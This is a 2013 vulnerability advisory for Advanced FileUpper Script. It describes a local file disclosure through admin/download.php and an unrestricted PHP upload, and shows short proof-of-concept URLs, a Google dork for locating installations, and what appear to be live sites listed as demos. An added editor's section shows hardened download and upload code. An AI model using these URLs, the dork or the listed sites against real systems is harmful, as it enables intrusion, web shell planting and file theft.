
Advanced FileUpper Script vX.X File Upload / LFD Vulnerabilities

Author: TUNISIAN CYBER , Published: 21-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Advanced FileUpper Script vX.X File Upload / LFD Vulnerabilities
[+] Date: 21-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/afus/
[+] Google Dork: intext:"this site is powered by advanced fileupper script v1.0."
[+] Tested on: Win7
[+] Friend's blog: http://na3il.com/

########################################################################################
+Description:
Advanced FileUpper Script (AFUS) is a file and image hosting script.
It is open source, easy to install and easy to use.



+Exploit:
Advanced FileUpper Script suffers from a Local File Disclosure (LFD) vulnerability and an unrestricted file upload vulnerability:

1/LFD:

File: admin/download.php : Lines 21-->22
Parameter: file (taken from $_GET and used as the path to serve, with no validation)

[PHP]
//Get the requested file
$file = $_GET['file'];
[/PHP]

P.O.C:
127.0.0.1/AFUS/admin/download.php?file=[FILE]
Local test (screenshot): http://img15.hostingpics.net/pics/428416wawa.png


2/File Upload:
Upload form (accepts a .php file without checking the type):
127.0.0.1/AFUS/picture_upload.php
Uploaded file is stored under the original name in a web-reachable directory, e.g. a shell at:
127.0.0.1/AFUS/upload/uploaded_images/nammi.php
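The two weaknesses above share one root cause: user-supplied names are used as filesystem paths without any check. The following is an added example by the editor, not code from the AFUS project; it places the reported vulnerable pattern beside a hardened download handler and a hardened image upload handler. The constant UPLOAD_DIR and the function names are assumptions chosen for illustration and do not correspond to identifiers in the script.

```php
<?php
// Added example, not AFUS project code. UPLOAD_DIR and the function names
// below are assumptions made for illustration.

const UPLOAD_DIR = __DIR__ . '/upload/uploaded_images';

// Vulnerable pattern, as reported for admin/download.php: the requested
// name is used as-is, so any file readable by the web server can be served.
function vulnerable_download(string $requested): ?string
{
    $file = $requested;                // no validation at all
    return is_readable($file) ? file_get_contents($file) : null;
}

// Hardened replacement: confine the request to one directory.
function safe_download(string $requested): ?string
{
    // 1. Accept only a bare file name (no slashes, no leading dot).
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $requested) || $requested[0] === '.') {
        return null;
    }
    // 2. Resolve both paths and require the file to sit inside UPLOAD_DIR.
    //    realpath() follows symlinks, so a planted link cannot escape either.
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . '/' . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                   // traversal or symlink escape
    }
    return is_file($path) ? file_get_contents($path) : null;
}

// Hardened upload: validate the content, discard the client-supplied name,
// and never store the result under an executable extension.
function safe_image_upload(array $upload): ?string
{
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    // Sniff the real type; $_FILES[...]['type'] is attacker-controlled.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($upload['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($upload['tmp_name']) === false) {
        return null;
    }
    // Server-chosen random name with a fixed, non-executable extension.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Usage (illustrative):
// header('Content-Type: application/octet-stream');
// echo safe_download($_GET['file'] ?? '') ?? '';
// $stored = safe_image_upload($_FILES['image'] ?? []);
```

Even with the upload handler fixed, the upload directory should be configured so the web server never executes scripts from it (for Apache, a php_flag engine off or a Require all denied on *.php in that directory; for nginx, no fastcgi location covering it). That second layer is what turns a future upload bypass into a harmless stored file rather than a web shell.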

+Fix:
No vendor fix available at the time of writing.

Demo:
http://blindfiles.co.za/afus_v.1.0/AFUS/
http://upload.blueborg.be/
http://shaffuploads.alotspace.com/
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, 5obzMtbga
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
